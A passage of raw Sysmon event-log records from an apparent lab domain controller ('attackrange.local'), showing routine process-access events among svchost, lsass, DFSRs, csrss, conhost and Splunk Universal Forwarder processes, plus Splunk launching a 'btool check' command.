Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.402{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.402{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B4-5F84-4C00-000000007F01}3756C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B4-5F84-4C00-000000007F01}3756C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16B4-5F84-4B00-000000007F01}37283752C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B4-5F84-4C00-000000007F01}3756C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.258{5D479F2C-16B4-5F84-4C00-000000007F01}3756C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B4-5F84-4B00-000000007F01}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B4-5F84-4B00-000000007F01}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.246{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B4-5F84-4B00-000000007F01}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 